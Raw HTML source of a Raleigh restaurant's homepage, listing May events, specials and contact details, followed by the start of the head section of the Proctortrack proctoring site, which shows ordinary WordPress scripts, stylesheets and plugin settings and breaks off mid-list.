role="navigation"> <div class="skip-link screen-reader-text"><a href="#content" title="Skip to content">Skip to content</a></div> <div class="menu-header"><ul id="menu-main-menu" class="menu"><li id="menu-item-21" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-7 current_page_item menu-item-21"><a href="http://www.backyardbistro.com/" aria-current="page">HOME</a></li> <li id="menu-item-36" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-36"><a href="http://www.backyardbistro.com/about/">ABOUT</a> <ul class="sub-menu"> <li id="menu-item-346" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-346"><a href="http://www.backyardbistro.com/whats-happening/">Events At The Bistro</a></li> <li id="menu-item-259" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-259"><a href="http://www.backyardbistro.com/about/">About Us</a></li> <li id="menu-item-252" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-252"><a href="http://www.backyardbistro.com/location/">Around Us</a></li> <li id="menu-item-653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-653"><a href="http://www.backyardbistro.com/employment/">Employment</a></li> </ul> </li> <li id="menu-item-1490" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1490"><a href="http://www.backyardbistro.com/images/BYB-Menu-Fall-2016.pdf">MENU</a> <ul class="sub-menu"> <li id="menu-item-273" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-273"><a href="http://www.backyardbistro.com/chefs-features/">Chef&#8217;s Features</a></li> <li id="menu-item-1751" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1751"><a href="http://www.backyardbistro.com/images/BYB-Menu-Fall-2016.pdf">Restaurant Menu</a></li> <li id="menu-item-3140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3140"><a href="http://www.backyardbistro.com/weekly-specials/">Weekly Specials</a></li> <li id="menu-item-2155" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2155"><a href="http://www.backyardbistro.com/tailgate-menu/">Tailgate Menu</a></li> <li id="menu-item-201" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-201"><a href="http://www.backyardbistro.com/beer-and-wine/">Beer &#038; Wine</a></li> <li id="menu-item-1673" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1673"><a href="http://www.backyardbistro.com/cocktails-etc/">Cocktails, Etc.</a></li> </ul> </li> <li id="menu-item-34" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-34"><a href="http://www.backyardbistro.com/catering/">CATERING</a> <ul class="sub-menu"> <li id="menu-item-258" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-258"><a href="http://www.backyardbistro.com/catering/">Catering Overview</a></li> <li id="menu-item-241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a href="http://www.backyardbistro.com/images/BYB-March-2019-Catering-Menu.pdf">Catering Menu</a></li> <li id="menu-item-228" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-228"><a href="http://www.backyardbistro.com/catering-request/">Catering Request</a></li> <li id="menu-item-199" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-199"><a href="http://www.backyardbistro.com/catering-faq/">Catering FAQs</a></li> <li id="menu-item-227" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-227"><a href="http://www.backyardbistro.com/tailgate-menu/">Tailgate Menu</a></li> </ul> </li> <li id="menu-item-654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-654"><a href="http://www.backyardbistro.com/press/">PRESS</a></li> <li id="menu-item-655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-655"><a href="http://www.backyardbistro.com/posts/">POSTS</a></li> <li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33"><a href="http://www.backyardbistro.com/contact/">CONTACT</a></li> </ul></div> <div style="float: right; width: 175px; margin: 8px 0px 0px 0px;"> <a href="https://www.facebook.com/pages/Backyard-Bistro/82302484633" target="_blank" style="float: left; margin: 0px 0px 0px 0px; padding: 0px;"><img src="http://www.backyardbistro.com/images/facebook_button.png" alt="follow us on Facebook" style="width: 30px;" /></a> <a href="https://twitter.com/backyardbistro" target="_blank" style="float: left; margin: 1px 0px 0px 20px; padding: 0px;"><img src="http://www.backyardbistro.com/images/twitter-button.png" alt="follow us on Twitter" style="width: 30px;" /></a> </div> </div><!-- #access --> <div id="accessmobile" role="navigation"> <div style="float: left; background-color: none; width: 35%; height: 35px;"> <a class="flip51"><img src="http://www.backyardbistro.com/images/menu-mobile-black.png" alt="menu" style="width: 90px; margin: 0% 0% 0% 30%; padding: 0%;" /></a> </div> <div style="float: left; background-color: none; width: 35%; height: 35px; margin-bottom: 10px;"> <p style="margin: 5px 0px 0px 30px; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.backyardbistro.com" class="menuhome">HOME</span></a></p> </div> <a href="https://www.facebook.com/pages/Backyard-Bistro/82302484633" target="_blank" style="float: left; margin: 0px 0px 0px 0px; padding: 0px;"><img src="http://www.backyardbistro.com/images/facebook_button.png" alt="follow us on Facebook" style="width: 30px;" /></a> <a href="https://twitter.com/backyardbistro" target="_blank" style="float: left; margin: 1px 0px 0px 10px; padding: 0px;"><img src="http://www.backyardbistro.com/images/twitter-button.png" alt="follow us on Twitter" style="width: 30px;" /></a> <div id="panel1"> <div class="menu-header"><ul id="menu-mobile-menu" class="menu"><li id="menu-item-2988" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-7 current_page_item menu-item-2988"><a href="http://www.backyardbistro.com/" aria-current="page">Home</a></li> <li id="menu-item-2989" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2989"><a href="http://www.backyardbistro.com/about/">About</a></li> <li id="menu-item-2990" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2990"><a href="http://www.backyardbistro.com/images/BYB-Menu-Fall-2016.pdf">Restaurant Menu</a></li> <li id="menu-item-2991" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2991"><a href="http://www.backyardbistro.com/whats-happening/">Events</a></li> <li id="menu-item-2992" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2992"><a href="http://www.backyardbistro.com/weekly-specials/">Specials</a></li> <li id="menu-item-2993" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2993"><a href="http://www.backyardbistro.com/chefs-features/">Chefs Features</a></li> <li id="menu-item-2994" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2994"><a href="http://www.backyardbistro.com/catering/">Catering</a></li> <li id="menu-item-2995" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2995"><a href="http://www.backyardbistro.com/catering-request/">Catering Request</a></li> <li id="menu-item-2996" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2996"><a href="http://www.backyardbistro.com/contact/">Contact</a></li> </ul></div></div> </div><!-- #accessmobile --> </div><!-- #masthead --> </div><!-- #header --> <div id="main"> <div id="containeronecol" class="one-column"> <div id="contentnotblog" role="main"> <div class="entry-content-home"> <div id="leftparchment" style="text-align: center;"> <h1><span style="color: #cc1212;">Welcome</span></h1><a href="http://www.backyardbistro.com/home/byb-catering-platter1/" rel="attachment wp-att-1408"><img width="300" height="199" class="aligncenter wp-image-2083 size-medium" alt="Backyard Bistro grilling classes July 2017" src="http://www.backyardbistro.com/images/Grilling-Class-Food-on-Grill-300x199.jpg" srcset="http://www.backyardbistro.com/images/Grilling-Class-Food-on-Grill-300x199.jpg 300w, http://www.backyardbistro.com/images/Grilling-Class-Food-on-Grill-768x511.jpg 768w, http://www.backyardbistro.com/images/Grilling-Class-Food-on-Grill-1024x681.jpg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a><h1><span style="color: #c21010;"><a style="color: #c21010;" href="http://www.backyardbistro.com/specials"><span style="color: #ff6600;"><span style="color: #cc1212;">What&#8217;s Happening</span></span><br /><span style="color: #cc1212;">at the Backyard in MAY?</span></a></span></h1><strong><strong><strong><span style="color: #bd0b0b;"><span style="color: #cc1212;"><a href="http://www.backyardbistro.com/10-yr-anniversary-may-giveaway-entry-form/"></a></span></span></strong></strong></strong><strong><strong><strong><span style="color: #bd0b0b;"><span style="color: #cc1212;"><img src="http://www.backyardbistro.com/images/TrimmedHurricanesLogo.png" alt="" width="471" height="294" class="aligncenter size-full wp-image-3668" srcset="http://www.backyardbistro.com/images/TrimmedHurricanesLogo.png 471w, http://www.backyardbistro.com/images/TrimmedHurricanesLogo-300x187.png 300w" sizes="(max-width: 471px) 100vw, 471px" />CAROLINA HURRICANES<br />vs<br />BOSTON BRUINS<br />Eastern Conference Final<br /><br />Game 3<br />Tuesday May 14, 8pm<br />PNC Arena<br /><br />Game 4<br />Thursday May 16, 8pm<br />PNC Arena<br /><br /><img src="http://www.backyardbistro.com/images/Big10AnnivGraphic.png" alt="Backyard Bistro 10-Year Anniversary" width="913" height="471" class="aligncenter size-full wp-image-3651" srcset="http://www.backyardbistro.com/images/Big10AnnivGraphic.png 913w, http://www.backyardbistro.com/images/Big10AnnivGraphic-300x155.png 300w, http://www.backyardbistro.com/images/Big10AnnivGraphic-768x396.png 768w" sizes="(max-width: 913px) 100vw, 913px" /></span></span></strong></strong></strong><strong><strong><strong><span style="color: #bd0b0b;"><span style="color: #cc1212;"><a href="http://www.backyardbistro.com/10-yr-anniversary-may-giveaway-entry-form/"><br /><img src="http://www.backyardbistro.com/images/BYB-MAY-Anniv-Prize-Button.png" alt="" width="548" height="95" class="aligncenter wp-image-3535 size-full" srcset="http://www.backyardbistro.com/images/BYB-MAY-Anniv-Prize-Button.png 548w, http://www.backyardbistro.com/images/BYB-MAY-Anniv-Prize-Button-300x52.png 300w" sizes="(max-width: 548px) 100vw, 548px" /></a></span></span></strong></strong></strong><span style="color: #bd0b0b;"><span style="color: #cc1212;"><span color="#ffffff"><img src="http://www.backyardbistro.com/images/MayGiveaway.png" alt="" width="470" height="201" class="aligncenter wp-image-3698 size-full" srcset="http://www.backyardbistro.com/images/MayGiveaway.png 470w, http://www.backyardbistro.com/images/MayGiveaway-300x128.png 300w" sizes="(max-width: 470px) 100vw, 470px" /></span></span></span><strong><strong><span style="color: #bd0b0b;"><span style="color: #cc1212;"><br />NEW! <br />TRIVIA NIGHT<br />THURSDAYS 7:30pm</span></span></strong></strong><strong><strong><strong><span><span color="#ffffff"><br /><br /><a href="https://www.my919dine.com/r/799/restaurants/delivery/Bar-Grill/Backyard-Bistro-Raleigh"><span style="color: #cc1212;">Backyard Bistro meals</span></a><br /><span style="color: #cc1212;">DELIVERED <br />to </span><span style="color: #cc1212;">your door using </span><br /><a href="https://www.my919dine.com/r/799/restaurants/delivery/Bar-Grill/Backyard-Bistro-Raleigh" style="color: #ff0000;"><img src="http://www.backyardbistro.com/images/919DineLogo.png" alt="Backyard Bistro Meals Delivered To Your Door" width="244" height="87" class="aligncenter wp-image-3486" srcset="http://www.backyardbistro.com/images/919DineLogo.png 600w, http://www.backyardbistro.com/images/919DineLogo-300x108.png 300w" sizes="(max-width: 244px) 100vw, 244px" /></a><br />OR<br /></span></span></strong><span style="color: #800000;"><span color="#ffffff">CALL US FOR A PICKUP ORDER</span><span color="#ffffff"><br /></span><span color="#ffffff">919-851-6203<br /></span></span></strong></strong><strong><strong><span><a href="http://www.backyardbistro.com/grill-on-locals-learn-grilling-techniques-at-backyard-bistro-classes/" style="color: #bd0b0b;"><br /></a><span style="color: #bd0b0b;">Backyard Bistro wins</span><br /><span style="color: #bd0b0b;">Wing Contest!</span><br /><a href="http://www.backyardbistro.com/backyard-bistro-wins-wing-contest/" style="color: #bd0b0b;"><img src="http://www.backyardbistro.com/images/Winner-of-Wing-Competition-2018-1-300x229.jpg" alt="Backyard Bistro wins Wing contest" width="300" height="229" class="aligncenter wp-image-3216 size-medium" srcset="http://www.backyardbistro.com/images/Winner-of-Wing-Competition-2018-1-300x229.jpg 300w, http://www.backyardbistro.com/images/Winner-of-Wing-Competition-2018-1-768x586.jpg 768w, http://www.backyardbistro.com/images/Winner-of-Wing-Competition-2018-1-1024x781.jpg 1024w, http://www.backyardbistro.com/images/Winner-of-Wing-Competition-2018-1.jpg 1349w" sizes="(max-width: 300px) 100vw, 300px" /></a><a href="http://www.backyardbistro.com/backyard-bistro-wins-wing-contest/" style="color: #bd0b0b;">READ THE ARTICLE<br /></a><br /></span></strong></strong><span style="color: #000000;"><span style="color: #000000;"><span style="color: #bd1c1c;"><strong></strong></span></span></span><span style="color: #000000;">Backyard Bistro&#8217;s food and bar specials are as competitive as the games played across the street at PNC Arena or Carter-Finley Stadium. Temperature Soup Mondays, Spaghetti Wednesdays and Prime Rib Fridays are weekly hits, along with a menu featuring more than 40 items under $10.<strong>  </strong></span><strong><span style="color: #bd0b0b;"><br /></span></strong><br /><span style="color: #c91010;"><strong>WE&#8217;RE HIRING!</strong></span><br /><a href="http://www.backyardbistro.com/employment/">GO TO EMPLOYMENT PAGE</a><br /><br /><br /> <a href="https://twitter.com/Backyardbistro"><img style="width: 96%; margin: 0%x 0% 2% 2%;" src="http://www.backyardbistro.com/images/sushi.png" /></a><br /><a href="http://www.backyardbistro.com/menu/#appetizers"> </a></div> <p id="homemiddle" style="text-align: center;"><strong><br /><span style="color: #ff0000;"><br /><br /></span></strong><strong><span style="color: #ff0000;" color="#ffffff"><strong><span style="color: #ff0000;" color="#ffffff"><a href="https://www.my919dine.com/r/799/restaurants/delivery/Bar-Grill/Backyard-Bistro-Raleigh"><span style="color: #ff9900;"></span></a><br /></span></strong><span style="color: #ffffff;"><strong><a href="http://www.backyardbistro.com/whats-happening/?event_id_1=889" rel="attachment wp-att-1264"><br /></a></strong></span> <a href="http://www.backyardbistro.com/menu/#entrees"><img style="width: 96%; margin: 2% 0% 0% 2%;" src="http://www.backyardbistro.com/images/Backyard-Bistro-Eggroll-fuzzyrotated.png" /></a> <a href="http://www.backyardbistro.com/menu/#appetizers"><img style="width: 96%; margin: 2.5% 0% 0% 2%;" src="http://www.backyardbistro.com/images/Backyard-Bistro-Pig-Wings-fuzzyrotated.png" /></a> <a href="http://www.backyardbistro.com/menu/#entrees"><img style="width: 96%; margin: 2% 0% 0% 2%;" src="http://www.backyardbistro.com/images/pizza_oven_5r.png" /> </a><a href="http://www.gopack.com/multimedia/gottfried-radio-affiliates.html" target="_blank" rel="noopener noreferrer"></a></span></strong></p> <div id="chalkboard"><p style="text-align: center;"> <a style="text-decoration: underline; color: #ff6600;" href="http://www.backyardbistro.com/weekly-specials/">WEEKLY DRINK SPECIALS</a><br /> </p><h2 style="text-align: left;"><span style="text-decoration: underline;"><strong>May 10 (Fri)</strong></span><br />Prime Rib Dinner Special </h2><h2 style="text-align: left;"><span style="text-decoration: underline;"><strong>May 11 (Sat)</strong></span><br />NC State University Graduation<br /><br /><span style="text-decoration: underline;"><strong>May 14 (Tue)</strong></span><br />BBQ Special<br /><br />Carolina Hurricanes vs <br />Boston Bruins<br />Game 3<br />8pm PNC Arena<br /><img src="http://www.backyardbistro.com/images/TrimmedHurricanesLogo.png" alt="" width="471" height="294" class="aligncenter size-full wp-image-3668" srcset="http://www.backyardbistro.com/images/TrimmedHurricanesLogo.png 471w, http://www.backyardbistro.com/images/TrimmedHurricanesLogo-300x187.png 300w" sizes="(max-width: 471px) 100vw, 471px" /></h2><h2 style="text-align: left;"><span style="text-decoration: underline;"><strong>May 15 (Wed)<br /></strong></span>Spaghetti Special<br />and<br />Family Night &#8211; Kids eat Free!<br /><img src="http://www.backyardbistro.com/images/BB-Kids-Eat-Free-257x300.jpg" alt="Kids under 10 eat free with purchase of an adult entree." width="257" height="300" class="aligncenter size-medium wp-image-3024" srcset="http://www.backyardbistro.com/images/BB-Kids-Eat-Free-257x300.jpg 257w, http://www.backyardbistro.com/images/BB-Kids-Eat-Free-768x896.jpg 768w, http://www.backyardbistro.com/images/BB-Kids-Eat-Free-878x1024.jpg 878w" sizes="(max-width: 257px) 100vw, 257px" /><br /><span style="text-decoration: underline;"><strong>May 16 (Thurs)</strong></span><br />Trivia Night 7:30pm</h2><h2 style="text-align: left;">Carolina Hurricanes vs <br />Boston Bruins<br />Game 4<br />8pm PNC Arena<br /><img src="http://www.backyardbistro.com/images/TrimmedHurricanesLogo.png" alt="" width="471" height="294" class="aligncenter size-full wp-image-3668" srcset="http://www.backyardbistro.com/images/TrimmedHurricanesLogo.png 471w, http://www.backyardbistro.com/images/TrimmedHurricanesLogo-300x187.png 300w" sizes="(max-width: 471px) 100vw, 471px" /></h2><h2 style="text-align: left;"><span style="text-decoration: underline;"><strong>May 17 (Fri)</strong></span><br />Prime Rib Dinner Special</h2><h2 style="text-align: left;"> </h2><p style="text-align: center;"><strong><a href="http://www.backyardbistro.com/whats-happening/?ytd_1=upcoming" style="color: #ff9000;">&gt;&gt;&gt; SEE ALL EVENTS&lt;&lt;&lt;</a></strong></p></div> </div><!-- .entry-content --> <div id="comments"> </div><!-- #comments --> </div><!-- #content --> </div><!-- #container --> </div><!-- #main --> <div id="footerpanel"> <p class="footertext">Backyard Bistro<span class="desktopmid">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&bull;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><br class="mobileonly" />Raleigh, NC<span class="desktoponly">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&bull;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><br class="mobilemid" /><a href="mailto:[email protected]" style="text-decoration: none; color: #FFF">[email protected]</a><span class="desktopmid">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&bull;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><br class="mobileonly" /><a href="tel:19198516203" style="color: #fff;">(919) 851-6203</a></p> </div><!--FooterPanel--> </div><!-- #wrapper --> </div><!-- #bricks --> <script type='text/javascript' src='http://www.backyardbistro.com/wp-includes/js/comment-reply.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/www.backyardbistro.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='http://www.backyardbistro.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='http://www.backyardbistro.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> </body> </html>
0
<!DOCTYPE html> <html class="no-touch" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://www.proctortrack.com/xmlrpc.php"> <title>Proctortrack &#8211; Completely automated online exam remote proctoring</title> <!-- Meta Tag Manager --> <meta name="robots" content="As the most student-friendly remote proctoring solution, Proctortrack offers completely automated and human-less online proctoring, scalable and on-demand approach which allows to take your online assessments anytime, anywhere!" /> <meta name="keywords" content="proctored exam, remote proctoring, online proctored exam, online exam proctoring, remote proctor, humanless proctoring, educational technology, online assessment, online proctor, online assessments,online exam test software" /> <meta name="description" content="As the most student-friendly remote proctoring solution, Proctortrack offers completely automated and human-less online proctoring, scalable and on-demand approach which allows to take your online assessments anytime, anywhere!" /> <meta name="title" content="Completely automated online exam remote proctoring" /> <!-- / Meta Tag Manager --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Proctortrack &raquo; Feed" href="https://www.proctortrack.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Proctortrack &raquo; Comments Feed" href="https://www.proctortrack.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.proctortrack.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.proctortrack.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='layerslider-css' href='https://www.proctortrack.com/wp-content/plugins/LayerSlider/static/css/layerslider.css?ver=5.6.10' type='text/css' media='all' /> <link rel='stylesheet' id='ls-google-fonts-css' href='https://fonts.googleapis.com/css?family=Lato:100,300,regular,700,900%7COpen+Sans:300%7CIndie+Flower:regular%7COswald:300,regular,700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.proctortrack.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='cookie-law-info-css' href='https://www.proctortrack.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=1.7.6' type='text/css' media='all' /> <link rel='stylesheet' id='cookie-law-info-gdpr-css' href='https://www.proctortrack.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.7.6' type='text/css' media='all' /> <link rel='stylesheet' id='uncode-style-css' href='https://www.proctortrack.com/wp-content/themes/uncode/library/css/style.css?ver=171754000' type='text/css' media='all' /> <style id='uncode-style-inline-css' type='text/css'> @media (max-width: 959px) { .navbar-brand > * { height: 30px !important;}} @media (min-width: 960px) { .limit-width { max-width: 1020px; margin: auto;}} </style> <link rel='stylesheet' id='uncode-icons-css' href='https://www.proctortrack.com/wp-content/themes/uncode/library/css/uncode-icons.css?ver=171754000' type='text/css' media='all' /> <link rel='stylesheet' id='uncode-custom-style-css' href='https://www.proctortrack.com/wp-content/themes/uncode/library/css/style-custom.css?ver=171754000' type='text/css' media='all' /> <style id='uncode-custom-style-inline-css' type='text/css'> .menu-light .menu-smart > li.active > a { color:#3097f7;}footer .footer-center {padding-top:20px;padding-bottom:20px;}#cookie-law-info-bar {text-align:left!important;padding:15px 65px 15px 25px!important;}.cookie_action_close_header{position:absolute;top:15px;right:30px;font-family:sans-serif;}.cli-plugin-main-link {margin-left:0px!important;}ul.topnav li a:hover {color:rgb(0,160,210);}ul.footer, ul.footer2{list-style-type:none;display:inline!important;}.footer li a{color:gray;}ul.footer, ul.footer2{list-style-type:none;}.footer2 li a{color:gray;}ul.footer2 li a:hover {color:rgb(0,160,210);}@media (max-width:960px){ .main-container .row_menu .row-parent {font-size:0.7em!important;padding:0px 30px;width:100%!important; }}@media screen and (max-width:841px) {ul.topnav li{float:right;vertical-align:middle;}ul.topnav li a {color:white;font-size:0.68em!important; }.main-container .menu_row .row-parent {padding:0px 30px;width:100%!important; } @media screen and (max-width:841px) { ul.topnav li a {padding:5px 5px;text-decoration:none; } } </style> <link rel='stylesheet' id='uncodefont-google-css' href='//fonts.googleapis.com/css?family=Poppins%3A300%2Cregular%2C500%2C600%2C700%7CHind%3A300%2Cregular%2C500%2C600%2C700%7CDroid+Serif%3Aregular%2Citalic%2C700%2C700italic%7CDosis%3A200%2C300%2Cregular%2C500%2C600%2C700%2C800%7CPlayfair+Display%3Aregular%2Citalic%2C700%2C700italic%2C900%2C900italic%7COswald%3A300%2Cregular%2C700%7CRoboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic%7CSource+Sans+Pro%3A200%2C200italic%2C300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C900%2C900italic&#038;subset=devanagari%2Clatin-ext%2Clatin%2Ccyrillic%2Cvietnamese%2Cgreek%2Ccyrillic-ext%2Cgreek-ext&#038;ver=1.4.2' type='text/css' media='all' /> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.8'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var LS_Meta = {"v":"5.6.10"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/plugins/LayerSlider/static/js/layerslider.kreaturamedia.jquery.js?ver=5.6.10'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/plugins/LayerSlider/static/js/layerslider.transitions.js?ver=5.6.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var Cli_Data = {"nn_cookie_ids":[],"cookielist":[]}; var log_object = {"ajax_url":"https:\/\/www.proctortrack.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.7.6'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian 